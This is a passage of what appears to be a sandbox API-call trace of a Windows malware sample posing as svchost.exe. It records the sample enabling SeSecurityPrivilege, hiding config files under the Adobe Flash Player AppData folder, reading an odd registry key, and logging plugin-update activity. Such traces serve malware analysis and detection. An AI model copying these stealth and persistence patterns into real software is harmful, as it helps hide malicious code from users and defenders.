TokenHandle=0x735f26c | out: TokenHandle=0x735f26c*=0x0) returned 0 [0122.587] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x735f26c | out: TokenHandle=0x735f26c*=0x2d4) returned 1 [0122.587] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x735f274 | out: lpLuid=0x735f274*(LowPart=0x8, HighPart=0)) returned 1 [0122.588] AdjustTokenPrivileges (in: TokenHandle=0x2d4, DisableAllPrivileges=0, NewState=0x735f270*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0122.588] GetLastError () returned 0x0 [0122.588] CloseHandle (hObject=0x2d4) returned 1 [0122.588] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0122.588] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x5214700, lpbSaclPresent=0x735f2a4, pSacl=0x735f298, lpbSaclDefaulted=0x735f2a0 | out: lpbSaclPresent=0x735f2a4, pSacl=0x735f298, lpbSaclDefaulted=0x735f2a0) returned 1 [0122.588] SetNamedSecurityInfoW () returned 0x0 [0122.599] LocalFree (hMem=0x5214700) returned 0x0 [0122.617] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe") returned 0x20 [0122.617] GetCurrentThread () returned 0xfffffffe [0122.617] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x735f26c | out: TokenHandle=0x735f26c*=0x0) returned 0 [0122.617] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x735f26c | out: TokenHandle=0x735f26c*=0x2d4) returned 1 [0122.617] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x735f274 | out: lpLuid=0x735f274*(LowPart=0x8, HighPart=0)) returned 1 [0122.619] AdjustTokenPrivileges (in: TokenHandle=0x2d4, DisableAllPrivileges=0, NewState=0x735f270*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0122.619] GetLastError () returned 0x0 [0122.619] CloseHandle (hObject=0x2d4) returned 1 [0122.619] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0122.619] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x5214700, lpbSaclPresent=0x735f2a4, pSacl=0x735f298, lpbSaclDefaulted=0x735f2a0 | out: lpbSaclPresent=0x735f2a4, pSacl=0x735f298, lpbSaclDefaulted=0x735f2a0) returned 1 [0122.619] SetNamedSecurityInfoW () returned 0x0 [0122.621] LocalFree (hMem=0x5214700) returned 0x0 [0122.621] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0122.621] GetFileSizeEx (in: hFile=0x2d4, lpFileSize=0x735f2b8 | out: lpFileSize=0x735f2b8*=3602) returned 1 [0122.621] VirtualAlloc (lpAddress=0x0, dwSize=0xe12, flAllocationType=0x3000, flProtect=0x4) returned 0x5340000 [0122.621] ReadFile (in: hFile=0x2d4, lpBuffer=0x5340000, nNumberOfBytesToRead=0xe12, lpNumberOfBytesRead=0x735f2c4, lpOverlapped=0x0 | out: lpBuffer=0x5340000*, lpNumberOfBytesRead=0x735f2c4*=0xe12, lpOverlapped=0x0) returned 1 [0122.629] CloseHandle (hObject=0x2d4) returned 1 [0122.629] wvnsprintfA (in: pszDest=0x5413e68, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366202") returned 10 [0122.630] wvnsprintfA (in: pszDest=0x5413e68, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366203") returned 10 [0122.634] wvnsprintfA (in: pszDest=0x5413e68, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366203") returned 10 [0122.635] wvnsprintfA (in: pszDest=0x5413e68, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366203") returned 10 [0122.636] wvnsprintfA (in: pszDest=0x5413e68, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366203") returned 10 [0122.637] wvnsprintfA (in: pszDest=0x5413ea8, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366203") returned 10 [0122.638] wvnsprintfA (in: pszDest=0x5413e68, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366203") returned 10 [0122.639] wvnsprintfA (in: pszDest=0x5413f68, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366203") returned 10 [0122.639] wvnsprintfA (in: pszDest=0x5413f68, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366204") returned 10 [0122.640] wvnsprintfA (in: pszDest=0x5413f68, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366204") returned 10 [0122.641] wvnsprintfA (in: pszDest=0x5413f68, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366204") returned 10 [0122.642] wvnsprintfA (in: pszDest=0x5413e68, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366204") returned 10 [0122.643] wvnsprintfA (in: pszDest=0x5413e68, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366204") returned 10 [0122.643] wvnsprintfA (in: pszDest=0x5413ea8, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366204") returned 10 [0122.644] wvnsprintfA (in: pszDest=0x5413e68, cchDest=21, pszFmt="%d", arglist=0x735f208 | out: pszDest="1476366204") returned 10 [0122.645] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0122.652] WriteFile (in: hFile=0x2d0, lpBuffer=0x5403bf0*, nNumberOfBytesToWrite=0xf00, lpNumberOfBytesWritten=0x735f2bc, lpOverlapped=0x0 | out: lpBuffer=0x5403bf0*, lpNumberOfBytesWritten=0x735f2bc, lpOverlapped=0x0) returned 1 [0122.653] CloseHandle (hObject=0x2d0) returned 1 [0122.666] ReleaseMutex (hMutex=0x1cc) returned 1 [0122.666] CloseHandle (hObject=0x1cc) returned 1 [0122.666] SetLastError (dwErrCode=0x0) [0122.666] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Fabo", ulOptions=0x0, samDesired=0x1, phkResult=0x735f11c | out: phkResult=0x735f11c*=0x1cc) returned 0x0 [0122.667] RegQueryValueExW (in: hKey=0x1cc, lpValueName="Vipoug", lpReserved=0x0, lpType=0x735f144, lpData=0x0, lpcbData=0x735f12c*=0x0 | out: lpType=0x735f144*=0x3, lpData=0x0, lpcbData=0x735f12c*=0x220) returned 0x0 [0122.667] RegQueryValueExW (in: hKey=0x1cc, lpValueName="Vipoug", lpReserved=0x0, lpType=0x735f144, lpData=0x54015a8, lpcbData=0x735f12c*=0x220 | out: lpType=0x735f144*=0x3, lpData=0x54015a8*, lpcbData=0x735f12c*=0x220) returned 0x0 [0122.667] RegCloseKey (hKey=0x1cc) returned 0x0 [0122.667] GetLastError () returned 0x0 [0122.667] GetLocalTime (in: lpSystemTime=0x735f628 | out: lpSystemTime=0x735f628*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xf, wMinute=0x2b, wSecond=0x19, wMilliseconds=0x56)) [0122.667] GetCurrentThreadId () returned 0xd70 [0122.667] GetCurrentProcessId () returned 0x2ec [0122.668] wvnsprintfW (in: pszDest=0x54020f0, cchDest=250, pszFmt="[%02u.%02u.%4u %02u:%02u:%02u] ver=%u.%u.%u, log=0x%04X, PID=0x%04X, TID=0x%04X, LE=%u(0x%X)\r\n%S: ", arglist=0x735f5cc | out: pszDest="[13.10.2016 15:43:25] ver=2.2.5, log=0x001A, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: ") returned 86 [0122.668] wvnsprintfW (in: pszDest=0x540219c, cchDest=1962, pszFmt="DynamicUpdate::updateplugin, get etag (%d) = %S", arglist=0x735f648 | out: pszDest="DynamicUpdate::updateplugin, get etag (64) = ") returned 45 [0122.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:25] ver=2.2.5, log=0x001A, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicUpdate::updateplugin, get etag (64) = ", cchWideChar=131, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 131 [0122.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:25] ver=2.2.5, log=0x001A, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicUpdate::updateplugin, get etag (64) = ", cchWideChar=131, lpMultiByteStr=0x5403100, cbMultiByte=132, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:25] ver=2.2.5, log=0x001A, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicUpdate::updateplugin, get etag (64) = ", lpUsedDefaultChar=0x0) returned 131 [0122.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:25] ver=2.2.5, log=0x001A, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicUpdate::updateplugin, get etag (64) = ", cchWideChar=131, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 131 [0122.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:25] ver=2.2.5, log=0x001A, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicUpdate::updateplugin, get etag (64) = ", cchWideChar=131, lpMultiByteStr=0x5401618, cbMultiByte=132, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:25] ver=2.2.5, log=0x001A, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicUpdate::updateplugin, get etag (64) = ", lpUsedDefaultChar=0x0) returned 131 [0122.669] GetSystemTime (in: lpSystemTime=0x735f218 | out: lpSystemTime=0x735f218*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xd, wMinute=0x2b, wSecond=0x19, wMilliseconds=0x56)) [0122.669] SystemTimeToFileTime (in: lpSystemTime=0x735f218, lpFileTime=0x735f208 | out: lpFileTime=0x735f208) returned 1 [0122.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0122.669] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x5412138, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0122.669] GetUserNameExW () returned 0x1 [0122.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0122.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x5413048, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", lpUsedDefaultChar=0x0) returned 27 [0122.670] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="8A") returned 2 [0122.670] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="00") returned 2 [0122.671] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="00") returned 2 [0122.671] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="00") returned 2 [0122.671] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="B7") returned 2 [0122.671] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="49") returned 2 [0122.671] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="67") returned 2 [0122.671] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="98") returned 2 [0122.671] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="F6") returned 2 [0122.671] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="14") returned 2 [0122.671] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="59") returned 2 [0122.671] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="35") returned 2 [0122.671] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="AA") returned 2 [0122.671] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="3E") returned 2 [0122.671] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="27") returned 2 [0122.671] wvnsprintfW (in: pszDest=0x735f000, cchDest=6, pszFmt="%02X", arglist=0x735efdc | out: pszDest="60") returned 2 [0122.671] CreateMutexW (lpMutexAttributes=0x4ece89c, bInitialOwner=0, lpName="8A000000B7496798F6145935AA3E2760") returned 0x1cc [0122.671] WaitForSingleObject (hHandle=0x1cc, dwMilliseconds=0xffffffff) returned 0x0 [0122.671] PathSkipRootW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned="Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player" [0122.671] GetFileAttributesW (lpFileName="C:\\Users") returned 0x11 [0122.672] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe") returned 0x10 [0122.672] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData") returned 0x12 [0122.672] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming") returned 0x10 [0122.672] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe") returned 0x10 [0122.672] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned 0x10 [0122.672] GetCurrentThread () returned 0xfffffffe [0122.672] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x735f264 | out: TokenHandle=0x735f264*=0x0) returned 0 [0122.673] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x735f264 | out: TokenHandle=0x735f264*=0x2dc) returned 1 [0122.673] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x735f26c | out: lpLuid=0x735f26c*(LowPart=0x8, HighPart=0)) returned 1 [0122.673] AdjustTokenPrivileges (in: TokenHandle=0x2dc, DisableAllPrivileges=0, NewState=0x735f268*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0122.674] GetLastError () returned 0x0 [0122.674] CloseHandle (hObject=0x2dc) returned 1 [0122.674] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0122.674] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x5214700, lpbSaclPresent=0x735f29c, pSacl=0x735f290, lpbSaclDefaulted=0x735f298 | out: lpbSaclPresent=0x735f29c, pSacl=0x735f290, lpbSaclDefaulted=0x735f298) returned 1 [0122.674] SetNamedSecurityInfoW () returned 0x0 [0122.681] LocalFree (hMem=0x5214700) returned 0x0 [0122.681] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe") returned 0x20 [0122.681] GetCurrentThread () returned 0xfffffffe [0122.681] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x735f264 | out: TokenHandle=0x735f264*=0x0) returned 0 [0122.681] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x735f264 | out: TokenHandle=0x735f264*=0x2dc) returned 1 [0122.682] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x735f26c | out: lpLuid=0x735f26c*(LowPart=0x8, HighPart=0)) returned 1 [0122.683] AdjustTokenPrivileges (in: TokenHandle=0x2dc, DisableAllPrivileges=0, NewState=0x735f268*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0122.683] GetLastError () returned 0x0 [0122.683] CloseHandle (hObject=0x2dc) returned 1 [0122.683] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0122.683] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x5214700, lpbSaclPresent=0x735f29c, pSacl=0x735f290, lpbSaclDefaulted=0x735f298 | out: lpbSaclPresent=0x735f29c, pSacl=0x735f290, lpbSaclDefaulted=0x735f298) returned 1 [0122.683] SetNamedSecurityInfoW () returned 0x0 [0122.684] LocalFree (hMem=0x5214700) returned 0x0 [0122.685] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0122.685] GetFileSizeEx (in: hFile=0x2dc, lpFileSize=0x735f2b0 | out: lpFileSize=0x735f2b0*=3840) returned 1 [0122.685] VirtualAlloc (lpAddress=0x0, dwSize=0xf00, flAllocationType=0x3000, flProtect=0x4) returned 0x5340000 [0122.685] ReadFile (in: hFile=0x2dc, lpBuffer=0x5340000, nNumberOfBytesToRead=0xf00, lpNumberOfBytesRead=0x735f2bc, lpOverlapped=0x0 | out: lpBuffer=0x5340000*, lpNumberOfBytesRead=0x735f2bc*=0xf00, lpOverlapped=0x0) returned 1 [0122.691] CloseHandle (hObject=0x2dc) returned 1 [0122.692] wvnsprintfA (in: pszDest=0x5416188, cchDest=21, pszFmt="%d", arglist=0x735f200 | out: pszDest="1476366202") returned 10 [0122.692] wvnsprintfA (in: pszDest=0x54161c8, cchDest=21, pszFmt="%d", arglist=0x735f200 | out: pszDest="1476366203") returned 10 [0122.693] wvnsprintfA (in: pszDest=0x54160a8, cchDest=21, pszFmt="%d", arglist=0x735f200 | out: pszDest="1476366203") returned 10 [0122.749] wvnsprintfA (in: pszDest=0x54160c8, cchDest=21, pszFmt="%d", arglist=0x735f200 | out: pszDest="1476366203") returned 10 [0122.750] wvnsprintfA (in: pszDest=0x54161e8, cchDest=21, pszFmt="%d", arglist=0x735f200 | out: pszDest="1476366203") returned 10 [0122.751] wvnsprintfA (in: pszDest=0x54160a8, cchDest=21, pszFmt="%d", arglist=0x735f200 | out: pszDest="1476366203") returned 10 [0122.752] wvnsprintfA (in: pszDest=0x54161a8, cchDest=21, pszFmt="%d", arglist=0x735f200 | out: pszDest="1476366203") returned 10 [0122.753] wvnsprintfA (in: pszDest=0x54160a8, cchDest=21, pszFmt="%d", arglist=0x735f200 | out: pszDest="1476366203") returned 10 [0122.754] wvnsprintfA (in: pszDest=0x54160e8, cchDest=21, pszFmt="%d", arglist=0x735f200 | out: pszDest="1476366204") returned 10 [0122.755] wvnsprintfA (in: pszDest=0x54160c8, cchDest=21, pszFmt="%d", arglist=0x735f200 | out: pszDest="1476366204") returned 10 [0122.756] wvnsprintfA (in: pszDest=0x5416168, cchDest=21, pszFmt="%d", arglist=0x735f200 | out: pszDest="1476366204") returned 10 [0122.757] wvnsprintfA (in: pszDest=0x54161a8, cchDest=21, pszFmt="%d", arglist=0x735f200 | out: pszDest="1476366204") returned 10 [0122.759] wvnsprintfA (in: pszDest=0x5416208, cchDest=21, pszFmt="%d", arglist=0x735f200 | out: pszDest="1476366204") returned 10 [0122.760] wvnsprintfA (in: pszDest=0x5416168, cchDest=21, pszFmt="%d", arglist=0x735f200 | out: pszDest="1476366204") returned 10 [0122.761] wvnsprintfA (in: pszDest=0x5416168, cchDest=21, pszFmt="%d", arglist=0x735f200 | out: pszDest="1476366204") returned 10 [0122.762] wvnsprintfA (in: pszDest=0x5416168, cchDest=21, pszFmt="%d", arglist=0x735f200 | out: pszDest="1476366205") returned 10 [0122.763] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0122.771] WriteFile (in: hFile=0x2d0, lpBuffer=0x5403db8*, nNumberOfBytesToWrite=0xfff, lpNumberOfBytesWritten=0x735f2b4, lpOverlapped=0x0 | out: lpBuffer=0x5403db8*, lpNumberOfBytesWritten=0x735f2b4, lpOverlapped=0x0) returned 1 [0122.772] CloseHandle (hObject=0x2d0) returned 1 [0122.790] ReleaseMutex (hMutex=0x1cc) returned 1 [0122.790] CloseHandle (hObject=0x1cc) returned 1 [0122.790] SetLastError (dwErrCode=0x0) [0122.790] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Fabo", ulOptions=0x0, samDesired=0x1, phkResult=0x735f5ac | out: phkResult=0x735f5ac*=0x1cc) returned 0x0 [0122.790] RegQueryValueExW (in: hKey=0x1cc, lpValueName="Onpiwaad", lpReserved=0x0, lpType=0x735f5d8, lpData=0x0, lpcbData=0x735f5bc*=0x0 | out: lpType=0x735f5d8*=0x0, lpData=0x0, lpcbData=0x735f5bc*=0x0) returned 0x2 [0122.790] RegCloseKey (hKey=0x1cc) returned 0x0 [0122.791] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\Desktop (create shortcut).igb" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\desktop (create shortcut).igb"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc [0122.791] GetFileSizeEx (in: hFile=0x1cc, lpFileSize=0x735f5b0 | out: lpFileSize=0x735f5b0*=0) returned 1 [0122.791] CloseHandle (hObject=0x1cc) returned 1 [0122.791] GetLastError () returned 0x0 [0122.791] GetLastError () returned 0x0 [0122.791] GetLocalTime (in: lpSystemTime=0x735f5c0 | out: lpSystemTime=0x735f5c0*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xf, wMinute=0x2b, wSecond=0x19, wMilliseconds=0xd3)) [0122.791] GetCurrentThreadId () returned 0xd70 [0122.792] GetCurrentProcessId () returned 0x2ec [0122.792] wvnsprintfW (in: pszDest=0x54020f0, cchDest=250, pszFmt="[%02u.%02u.%4u %02u:%02u:%02u] ver=%u.%u.%u, log=0x%04X, PID=0x%04X, TID=0x%04X, LE=%u(0x%X)\r\n%S: ", arglist=0x735f564 | out: pszDest="[13.10.2016 15:43:25] ver=2.2.5, log=0x001B, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: ") returned 86 [0122.792] wvnsprintfW (in: pszDest=0x540219c, cchDest=1962, pszFmt="DynamicConfig::getCurrent %u get crypted error %u.", arglist=0x735f5e0 | out: pszDest="DynamicConfig::getCurrent 1 get crypted error 0.") returned 48 [0122.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:25] ver=2.2.5, log=0x001B, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 134 [0122.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:25] ver=2.2.5, log=0x001B, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x545a0c0, cbMultiByte=135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:25] ver=2.2.5, log=0x001B, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", lpUsedDefaultChar=0x0) returned 134 [0122.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:25] ver=2.2.5, log=0x001B, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 134 [0122.792] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:25] ver=2.2.5, log=0x001B, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x545a270, cbMultiByte=135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:25] ver=2.2.5, log=0x001B, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", lpUsedDefaultChar=0x0) returned 134 [0122.793] GetSystemTime (in: lpSystemTime=0x735f1b0 | out: lpSystemTime=0x735f1b0*(wYear=0x7e0, wMonth=0xa, 